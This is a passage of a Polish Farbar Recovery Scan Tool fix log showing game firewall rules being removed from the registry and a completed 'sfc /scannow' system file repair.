"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{F2A53A20-576A-4922-AA32-07C8F247A8D4}D:\dying light\dyinglightgame-culture=pl.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{B81C4B5B-BB87-4EE2-A6F9-B67C518ED949}D:\dying light\dyinglightgame-culture=pl.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{2AC76721-5115-41AE-9FAE-3895B2AB4C60}D:\reddeadredemption2\rdr2.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F8C14013-8D5A-44B6-984B-04AEB4A99AEE}D:\reddeadredemption2\rdr2.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{99106467-965F-459F-9677-B7F7860E609D}D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{A760D118-57B4-4632-A822-306432DB0EFF}D:\steam\steamapps\common\overprime\overprime\binaries\win64\paragonclient-win64-shipping.exe" => pomyślnie usunięto ========= sfc /scannow ========= Beginning system scan. This process will take some time. Beginning verification phase of system scan. Verification 0% complete. Verification 1% complete. Verification 1% complete. Verification 2% complete. Verification 2% complete. Verification 3% complete. Verification 4% complete. Verification 4% complete. Verification 5% complete. Verification 5% complete. Verification 6% complete. Verification 7% complete. Verification 7% complete. Verification 8% complete. Verification 8% complete. Verification 9% complete. Verification 10% complete. Verification 10% complete. Verification 11% complete. Verification 11% complete. Verification 12% complete. Verification 13% complete. Verification 13% complete. Verification 14% complete. Verification 14% complete. Verification 15% complete. Verification 16% complete. Verification 16% complete. Verification 17% complete. Verification 17% complete. Verification 18% complete. Verification 19% complete. Verification 19% complete. Verification 20% complete. Verification 20% complete. Verification 21% complete. Verification 22% complete. Verification 22% complete. Verification 23% complete. Verification 23% complete. Verification 24% complete. Verification 25% complete. Verification 25% complete. Verification 26% complete. Verification 26% complete. Verification 27% complete. Verification 28% complete. Verification 28% complete. Verification 29% complete. Verification 29% complete. Verification 30% complete. Verification 31% complete. Verification 31% complete. Verification 32% complete. Verification 32% complete. Verification 33% complete. Verification 33% complete. Verification 34% complete. Verification 35% complete. Verification 35% complete. Verification 36% complete. Verification 36% complete. Verification 37% complete. Verification 38% complete. Verification 38% complete. Verification 39% complete. Verification 39% complete. Verification 40% complete. Verification 41% complete. Verification 41% complete. Verification 42% complete. Verification 42% complete. Verification 43% complete. Verification 44% complete. Verification 44% complete. Verification 45% complete. Verification 45% complete. Verification 46% complete. Verification 47% complete. Verification 47% complete. Verification 48% complete. Verification 48% complete. Verification 49% complete. Verification 50% complete. Verification 50% complete. Verification 51% complete. Verification 51% complete. Verification 52% complete. Verification 53% complete. Verification 53% complete. Verification 54% complete. Verification 54% complete. Verification 55% complete. Verification 56% complete. Verification 56% complete. Verification 57% complete. Verification 57% complete. Verification 58% complete. Verification 59% complete. Verification 59% complete. Verification 60% complete. Verification 60% complete. Verification 61% complete. Verification 62% complete. Verification 62% complete. Verification 63% complete. Verification 63% complete. Verification 64% complete. Verification 65% complete. Verification 65% complete. Verification 66% complete. Verification 66% complete. Verification 67% complete. Verification 67% complete. Verification 68% complete. Verification 69% complete. Verification 69% complete. Verification 70% complete. Verification 70% complete. Verification 71% complete. Verification 72% complete. Verification 72% complete. Verification 73% complete. Verification 73% complete. Verification 74% complete. Verification 75% complete. Verification 75% complete. Verification 76% complete. Verification 76% complete. Verification 77% complete. Verification 78% complete. Verification 78% complete. Verification 79% complete. Verification 79% complete. Verification 80% complete. Verification 81% complete. Verification 81% complete. Verification 82% complete. Verification 82% complete. Verification 83% complete. Verification 84% complete. Verification 84% complete. Verification 85% complete. Verification 85% complete. Verification 86% complete. Verification 87% complete. Verification 87% complete. Verification 88% complete. Verification 88% complete. Verification 89% complete. Verification 90% complete. Verification 90% complete. Verification 91% complete. Verification 91% complete. Verification 92% complete. Verification 93% complete. Verification 93% complete. Verification 94% complete. Verification 94% complete. Verification 95% complete. Verification 96% complete. Verification 96% complete. Verification 97% complete. Verification 97% complete. Verification 98% complete. Verification 99% complete. Verification 99% complete. Verification 100% complete. Windows Resource Protection found corrupt files and successfully repaired them. For online repairs, details are included in the CBS log file located at windir\Logs\CBS\CBS.log. For example C:\Windows\Logs\CBS\CBS.log. For offline repairs, details are included in the log file provided by the /OFFLOGFILE flag. ========= Koniec CMD: ========= System wymagał restartu. ==== Koniec Fixlog 23:39:40 ====